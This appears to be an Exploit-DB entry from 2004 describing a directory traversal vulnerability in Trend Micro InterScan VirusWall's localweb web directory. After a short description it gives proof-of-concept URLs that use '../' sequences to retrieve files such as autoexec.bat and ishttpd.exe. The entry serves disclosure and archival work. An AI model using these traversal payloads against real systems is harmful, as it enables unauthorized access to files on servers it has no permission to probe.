Trend Micro Interscan VirusWall localweb - Directory Traversal

EDB-ID:

23875


Platform:

Windows

Published:

2004-03-24

source: http://www.securityfocus.com/bid/9966/info

It has been reported that InterScan VirusWall may to a directory traversal vulnerability that may allow an attacker to request files from the '/ishttp/localweb' directory and any sub directories of 'localweb' with directory traversal strings such as '../'.

http://www.example.com/ishttpd/localweb/filename
http://www.example.com/ishttpd/localweb/java/?/../../../../../../../../autoexec.bat
http://www.example.com/ishttpd/localweb/java/?/../../../ishttpd.exe